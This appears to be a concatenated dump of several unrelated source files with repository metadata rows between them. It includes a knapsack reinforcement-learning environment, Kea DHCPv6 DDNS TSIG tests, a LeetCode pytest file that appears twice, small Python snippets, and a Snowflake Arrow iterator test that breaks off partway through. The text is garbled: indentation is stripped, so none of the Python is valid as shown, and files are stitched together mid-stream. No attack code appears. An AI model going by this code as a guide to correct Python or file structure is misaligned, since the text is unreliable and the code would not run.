class KnapSackHardEnv(KnapSackMediumEnv):
# items disappear from bag after item_stay_duration time steps
def __init__(self):
super().__init__()
self.time_horizon = 100
self.item_stay_duration = 5 # time steps
self.csv_file = 'knapsack_hard.csv'
def reset(self):
initial_state = super().reset()
return initial_state
def step(self, action):
dummy_item = Item(weight=0, volume=0, value=0)
done = False
if action == Action.THROW: # don't put item in bag
reward = self.drop_penalty
self.selected_item_queue.put(dummy_item)
elif action == Action.PUT: # put the item in bag
if (self.bag_weight_capacity < self.bag_weight + self.item.weight) \
or (self.bag_volume_capacity < self.bag_volume + self.item.volume):
# drop the item
reward = self.drop_penalty
self.selected_item_queue.put(dummy_item)
else:
self.selected_item_queue.put(self.item)
self.bag_weight += self.item.weight
self.bag_volume += self.item.volume
self.bag_value += self.item.value
reward = self.item.value
else:
raise ValueError("Invalid action {}".format(action))
self.total_reward += reward
self.time_remaining -= 1
if self.time_remaining == 0:
done = True
if self.time_remaining < (self.time_horizon - self.item_stay_duration):
# items disappear after stay duration
exit_item = self.selected_item_queue.get()
self.bag_weight -= exit_item.weight
self.bag_volume -= exit_item.volume
if done:
# get baseline results
if self.episode_count % 10 == 0:
weights = [x.weight for x in self.items_list]
volumes = [x.volume for x in self.items_list]
values = [x.value for x in self.items_list]
result = get_knapsack_benchmark_sol_hard_greedy_heuristic(
weights, volumes, values,
self.bag_weight_capacity, self.bag_volume_capacity,
self.drop_penalty, self.item_stay_duration)
print("Baseline reward: ", result[0], "RL Reward: ", self.total_reward)
# Save it to file
with open(self.csv_file, 'a') as f:
writer = csv.writer(f)
writer.writerow([self.episode_count, self.total_reward, result[0]])
self.item = Item.get_random_item(max_value=self.max_item_value, max_weight=Capacity.max_weight,
max_volume=Capacity.max_volume)
self.items_list += [self.item]
state = [self.bag_weight_capacity,
self.bag_volume_capacity,
self.bag_weight,
self.bag_volume,
self.bag_value,
self.item.weight,
self.item.volume,
self.item.value,
self.time_remaining,
]
info = {}
return state, reward, done, info
class KnapSackCommonEnv(KnapSackMediumEnv):
# items disappear from bag after item_stay_duration time steps
def __init__(self):
super().__init__()
self.time_horizon = 100
self.item_stay_duration = 5 # time steps
self.csv_file = 'knapsack_hard.csv'
def reset(self):
initial_state = super().reset()
return initial_state
def step(self, action):
dummy_item = Item(weight=0, volume=0, value=0)
done = False
if action == Action.THROW: # don't put item in bag
reward = self.drop_penalty
self.selected_item_queue.put(dummy_item)
elif action == Action.PUT: # put the item in bag
if (self.bag_weight_capacity < self.bag_weight + self.item.weight) \
or (self.bag_volume_capacity < self.bag_volume + self.item.volume):
# drop the item
reward = self.drop_penalty
self.selected_item_queue.put(dummy_item)
else:
self.selected_item_queue.put(self.item)
self.bag_weight += self.item.weight
self.bag_volume += self.item.volume
self.bag_value += self.item.value
reward = self.item.value
else:
raise ValueError("Invalid action {}".format(action))
self.total_reward += reward
self.time_remaining -= 1
if self.time_remaining == 0:
done = True
if self.time_remaining < (self.time_horizon - self.item_stay_duration):
# items disappear after stay duration
exit_item = self.selected_item_queue.get()
self.bag_weight -= exit_item.weight
self.bag_volume -= exit_item.volume
if done:
# get baseline results
if self.episode_count % 10 == 0:
weights = [x.weight for x in self.items_list]
volumes = [x.volume for x in self.items_list]
values = [x.value for x in self.items_list]
result = get_knapsack_benchmark_sol_hard_greedy_heuristic(
weights, volumes, values,
self.bag_weight_capacity, self.bag_volume_capacity,
self.drop_penalty, self.item_stay_duration)
print("Baseline reward: ", result[0], "RL Reward: ", self.total_reward)
# Save it to file
with open(self.csv_file, 'a') as f:
writer = csv.writer(f)
writer.writerow([self.episode_count, self.total_reward, result[0]])
self.item = Item.get_random_item(max_value=self.max_item_value, max_weight=Capacity.max_weight,
max_volume=Capacity.max_volume)
self.items_list += [self.item]
state = [self.bag_weight_capacity,
self.bag_volume_capacity,
self.bag_weight,
self.bag_volume,
self.bag_value,
self.item.weight,
self.item.volume,
self.item.value,
self.time_remaining,
]
info = {}
return state, reward, done, info
class Action:
THROW = 0
PUT = 1
| 40.871397
| 109
| 0.535995
| 2,043
| 18,433
| 4.603524
| 0.070485
| 0.061776
| 0.05529
| 0.042424
| 0.876236
| 0.858161
| 0.839979
| 0.822541
| 0.809357
| 0.800425
| 0
| 0.007441
| 0.387566
| 18,433
| 450
| 110
| 40.962222
| 0.825671
| 0.080237
| 0
| 0.793003
| 0
| 0
| 0.017522
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043732
| false
| 0
| 0.03207
| 0
| 0.125364
| 0.011662
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40b08a386e45a0ef0ae29a19efeec333eb7ea4b5
| 14,930
|
py
|
Python
|
tests/dhcpv6/ddns/test_ddns_tsig_release.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 22
|
2015-02-27T11:51:05.000Z
|
2022-02-28T12:39:29.000Z
|
tests/dhcpv6/ddns/test_ddns_tsig_release.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 16
|
2018-10-30T15:00:12.000Z
|
2019-01-11T17:55:13.000Z
|
tests/dhcpv6/ddns/test_ddns_tsig_release.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 11
|
2015-02-27T11:51:36.000Z
|
2021-03-30T08:33:54.000Z
|
"""DDNS without TSIG"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_msg
import misc
import srv_control
@pytest.mark.v6
@pytest.mark.ddns
@pytest.mark.kea_only
@pytest.mark.tsig
@pytest.mark.forward_reverse_remove
def test_ddns6_tsig_sha1_forw_and_rev_release():
misc.test_setup()
srv_control.config_srv_subnet('2001:db8:1::/64', '2001:db8:1::50-2001:db8:1::50')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'six')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('six.example.com.', 'forge.sha1.key')
srv_control.add_reverse_ddns('1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.', 'forge.sha1.key')
srv_control.add_keys('forge.sha1.key', 'HMAC-SHA1', 'PN4xKZ/jDobCMlo4rpr70w==')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(3)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_save_option_count(1, 'IA_NA')
srv_msg.client_save_option_count(1, 'server-id')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'sth6.six.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(39)
srv_msg.response_check_option_content(39, 'flags', 'S')
srv_msg.response_check_option_content(39, 'fqdn', 'sth6.six.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '2001:db8:1::50')
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'sth6.six.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname',
'0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
@pytest.mark.v6
@pytest.mark.ddns
@pytest.mark.kea_only
@pytest.mark.tsig
@pytest.mark.forward_reverse_remove
def test_ddns6_tsig_forw_and_rev_release_notenabled():
misc.test_setup()
srv_control.config_srv_subnet('2001:db8:1::/64', '2001:db8:1::50-2001:db8:1::50')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'six')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('six.example.com.', 'forge.sha1.key')
srv_control.add_reverse_ddns('1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.', 'forge.sha1.key')
srv_control.add_keys('forge.sha1.key', 'HMAC-SHA1', 'PN4xKZ/jDobCMlo4rpr70w==')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(3)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_save_option_count(1, 'IA_NA')
srv_msg.client_save_option_count(1, 'server-id')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'sth6.six.example.com.')
srv_msg.client_sets_value('Client', 'FQDN_flags', 'S')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(39)
srv_msg.response_check_option_content(39, 'flags', 'S')
srv_msg.response_check_option_content(39, 'fqdn', 'sth6.six.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '2001:db8:1::50')
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'sth6.six.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname',
'0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.')
misc.test_procedure()
srv_control.start_srv('DHCP', 'stopped')
misc.test_setup()
srv_control.config_srv_subnet('2001:db8:1::/64', '2001:db8:1::50-2001:db8:1::50')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', False)
srv_control.add_ddns_server_options('generated-prefix', 'six')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('six.example.com.', 'forge.sha1.key')
srv_control.add_reverse_ddns('1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.', 'forge.sha1.key')
srv_control.add_keys('forge.sha1.key', 'HMAC-SHA1', 'PN4xKZ/jDobCMlo4rpr70w==')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', '2001:db8:1::50')
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'sth6.six.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname',
'0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.')
@pytest.mark.v6
@pytest.mark.ddns
@pytest.mark.kea_only
@pytest.mark.tsig
@pytest.mark.reverse_remove
def test_ddns6_tsig_sha1_rev_release():
misc.test_setup()
srv_control.config_srv_subnet('2001:db8:1::/64', '2001:db8:1::50-2001:db8:1::50')
srv_control.add_ddns_server('127.0.0.1', '53001')
srv_control.add_ddns_server_options('enable-updates', True)
srv_control.add_ddns_server_options('generated-prefix', 'six')
srv_control.add_ddns_server_options('qualifying-suffix', 'example.com')
srv_control.add_forward_ddns('six.example.com.', 'forge.sha1.key')
srv_control.add_reverse_ddns('1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.', 'forge.sha1.key')
srv_control.add_keys('forge.sha1.key', 'HMAC-SHA1', 'PN4xKZ/jDobCMlo4rpr70w==')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
srv_control.use_dns_set_number(3)
srv_control.start_srv('DNS', 'started')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_save_option_count(1, 'IA_NA')
srv_msg.client_save_option_count(1, 'server-id')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'sth6.six.example.com.')
srv_msg.client_does_include('Client', 'fqdn')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
srv_msg.response_check_include_option(39)
srv_msg.response_check_option_content(39, 'flags', 'S', expect_include=False)
srv_msg.response_check_option_content(39, 'flags', 'N', expect_include=False)
srv_msg.response_check_option_content(39, 'flags', 'O', expect_include=False)
srv_msg.response_check_option_content(39, 'fqdn', 'sth6.six.example.com.')
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER')
srv_msg.dns_option_content('ANSWER', 'rdata', 'sth6.six.example.com.')
srv_msg.dns_option_content('ANSWER', 'rrname',
'0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
srv_msg.client_add_saved_option_count(1)
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'REPLY')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(2)
misc.test_procedure()
srv_msg.dns_question_record('sth6.six.example.com', 'AAAA', 'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
misc.test_procedure()
srv_msg.dns_question_record('0.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa.',
'PTR',
'IN')
srv_msg.client_send_dns_query()
misc.pass_criteria()
srv_msg.send_wait_for_query('MUST')
srv_msg.dns_option('ANSWER', expect_include=False)
| 39.813333
| 108
| 0.691226
| 2,490
| 14,930
| 3.815261
| 0.05261
| 0.049684
| 0.060316
| 0.069474
| 0.984421
| 0.982421
| 0.982421
| 0.978526
| 0.978526
| 0.978526
| 0
| 0.059073
| 0.146216
| 14,930
| 374
| 109
| 39.919786
| 0.686201
| 0.004086
| 0
| 0.957377
| 0
| 0.04918
| 0.239185
| 0.108861
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009836
| true
| 0.081967
| 0.013115
| 0
| 0.022951
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
40f2bdf2ff737927ae5c8ba7967ce36f0824a938
| 258
|
py
|
Python
|
metamaker/commands/sagemaker/__init__.py
|
altescy/metamaker
|
6161b1286ef36687321213cfb1233767fb240bec
|
[
"MIT"
] | 5
|
2021-11-07T16:10:29.000Z
|
2022-01-09T16:55:30.000Z
|
metamaker/commands/sagemaker/__init__.py
|
altescy/metamaker
|
6161b1286ef36687321213cfb1233767fb240bec
|
[
"MIT"
] | 2
|
2021-11-09T05:37:30.000Z
|
2021-11-09T05:37:51.000Z
|
metamaker/commands/sagemaker/__init__.py
|
altescy/metamaker
|
6161b1286ef36687321213cfb1233767fb240bec
|
[
"MIT"
] | null | null | null |
from metamaker.commands.sagemaker.deploy import DeployWithSagemakerCommand # noqa: F401
from metamaker.commands.sagemaker.sagemaker import SageMakerCommand # noqa: F401
from metamaker.commands.sagemaker.train import TrainWithSagemakerCommand # noqa: F401
| 64.5
| 88
| 0.848837
| 27
| 258
| 8.111111
| 0.444444
| 0.178082
| 0.287671
| 0.410959
| 0.347032
| 0.347032
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 0.093023
| 258
| 3
| 89
| 86
| 0.897436
| 0.124031
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dc0e6d8bce5be4b6a90e027e0478d094f703d8c9
| 304
|
py
|
Python
|
StringModification.py
|
AmreshTripathy/Python
|
e86420fef7f52da393be5b50ac2f13bddfeb3306
|
[
"Apache-2.0"
] | 4
|
2021-05-27T05:06:09.000Z
|
2021-06-12T17:12:47.000Z
|
StringModification.py
|
AmreshTripathy/Python
|
e86420fef7f52da393be5b50ac2f13bddfeb3306
|
[
"Apache-2.0"
] | null | null | null |
StringModification.py
|
AmreshTripathy/Python
|
e86420fef7f52da393be5b50ac2f13bddfeb3306
|
[
"Apache-2.0"
] | null | null | null |
n = int(input())
for i in range(0, n):
string = input()
for j in range(0, len(string)):
if (j % 2 == 0):
print (string[j],end='')
print(" ",end='')
for j in range(0, len(string)):
if(j % 2 != 0):
print (string[j],end='')
print("")
| 23.384615
| 37
| 0.421053
| 44
| 304
| 2.909091
| 0.340909
| 0.164063
| 0.1875
| 0.171875
| 0.71875
| 0.71875
| 0.71875
| 0.71875
| 0.71875
| 0.71875
| 0
| 0.036458
| 0.368421
| 304
| 12
| 38
| 25.333333
| 0.630208
| 0
| 0
| 0.363636
| 0
| 0
| 0.003425
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.363636
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9065069eba8e7a5b40e3c8e8aa797f080d6fb026
| 1,194
|
py
|
Python
|
tests/test_1881.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1881.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1881.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 1881. Maximum Value after Insertion
"""
@pytest.fixture(scope="session")
def init_variables_1881():
from src.leetcode_1881_maximum_value_after_insertion import Solution
solution = Solution()
def _init_variables_1881():
return solution
yield _init_variables_1881
class TestClass1881:
def test_solution_0(self, init_variables_1881):
assert init_variables_1881().maxValue("99", 9) == "999"
def test_solution_1(self, init_variables_1881):
assert init_variables_1881().maxValue("-13", 2) == "-123"
#!/usr/bin/env python
import pytest
"""
Test 1881. Maximum Value after Insertion
"""
@pytest.fixture(scope="session")
def init_variables_1881():
from src.leetcode_1881_maximum_value_after_insertion import Solution
solution = Solution()
def _init_variables_1881():
return solution
yield _init_variables_1881
class TestClass1881:
def test_solution_0(self, init_variables_1881):
assert init_variables_1881().maxValue("99", 9) == "999"
def test_solution_1(self, init_variables_1881):
assert init_variables_1881().maxValue("-13", 2) == "-123"
| 20.947368
| 72
| 0.716918
| 152
| 1,194
| 5.302632
| 0.243421
| 0.225806
| 0.295285
| 0.104218
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.109756
| 0.175879
| 1,194
| 56
| 73
| 21.321429
| 0.70935
| 0.033501
| 0
| 1
| 0
| 0
| 0.035985
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.307692
| false
| 0
| 0.153846
| 0.076923
| 0.615385
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
907720645e479a1c53f5adc502da42efab04a4c8
| 5,614
|
py
|
Python
|
test/test_unit_arrow_chunk_iterator.py
|
mariusvniekerk/snowflake-connector-python
|
4c6b728f9ca7ac9c8a318741924a963a5574e216
|
[
"Apache-2.0"
] | null | null | null |
test/test_unit_arrow_chunk_iterator.py
|
mariusvniekerk/snowflake-connector-python
|
4c6b728f9ca7ac9c8a318741924a963a5574e216
|
[
"Apache-2.0"
] | null | null | null |
test/test_unit_arrow_chunk_iterator.py
|
mariusvniekerk/snowflake-connector-python
|
4c6b728f9ca7ac9c8a318741924a963a5574e216
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2019 Snowflake Computing Inc. All right reserved.
#
from io import BytesIO
import random
import pytest
try:
from pyarrow import RecordBatchStreamReader
from pyarrow import RecordBatchStreamWriter
from pyarrow import RecordBatch
from snowflake.connector.arrow_iterator import PyArrowChunkIterator
import pyarrow
except ImportError:
pass
@pytest.mark.skip(
reason="Cython is not enabled in build env")
def test_iterate_over_string_chunk():
stream = BytesIO()
field_foo = pyarrow.field("column_foo", pyarrow.string(), True)
field_bar = pyarrow.field("column_bar", pyarrow.string(), True)
schema = pyarrow.schema([field_foo, field_bar])
column_meta = [
("column_foo", "TEXT", None, 0, 0, 0, 0),
("column_bar", "TEXT", None, 0, 0, 0, 0)
]
column_size = 2
batch_row_count = 10
batch_count = 10
expected_data = []
writer = RecordBatchStreamWriter(stream, schema)
for i in range(batch_count):
column_arrays = []
py_arrays = []
for j in range(column_size):
column_data = []
for k in range(batch_row_count):
data = None if bool(random.getrandbits(1)) else random.randint(-100, 100)
column_data.append(str(data))
column_arrays.append(column_data)
py_arrays.append(pyarrow.array(column_data))
expected_data.append(column_arrays)
rb = RecordBatch.from_arrays(py_arrays, ["column_foo", "column_bar"])
writer.write_batch(rb)
writer.close()
# seek stream to begnning so that we can read from stream
stream.seek(0)
reader = RecordBatchStreamReader(stream)
it = PyArrowChunkIterator()
for rb in reader:
it.add_record_batch(rb)
count = 0
while True:
try:
val = next(it)
assert val[0] == expected_data[int(count / 10)][0][count % 10]
assert val[1] == expected_data[int(count / 10)][1][count % 10]
count += 1
except StopIteration:
assert count == 100
break
@pytest.mark.skip(
reason="Cython is not enabled in build env")
def test_iterate_over_int64_chunk():
stream = BytesIO()
field_foo = pyarrow.field("column_foo", pyarrow.int64(), True)
field_bar = pyarrow.field("column_bar", pyarrow.int64(), True)
schema = pyarrow.schema([field_foo, field_bar])
column_meta = [
("column_foo", "FIXED", None, 0, 0, 0, 0),
("column_bar", "FIXED", None, 0, 0, 0, 0)
]
column_size = 2
batch_row_count = 10
batch_count = 10
expected_data = []
writer = RecordBatchStreamWriter(stream, schema)
for i in range(batch_count):
column_arrays = []
py_arrays = []
for j in range(column_size):
column_data = []
for k in range(batch_row_count):
data = None if bool(random.getrandbits(1)) else random.randint(-100, 100)
column_data.append(data)
column_arrays.append(column_data)
py_arrays.append(pyarrow.array(column_data))
expected_data.append(column_arrays)
rb = RecordBatch.from_arrays(py_arrays, ["column_foo", "column_bar"])
writer.write_batch(rb)
writer.close()
# seek stream to begnning so that we can read from stream
stream.seek(0)
reader = RecordBatchStreamReader(stream)
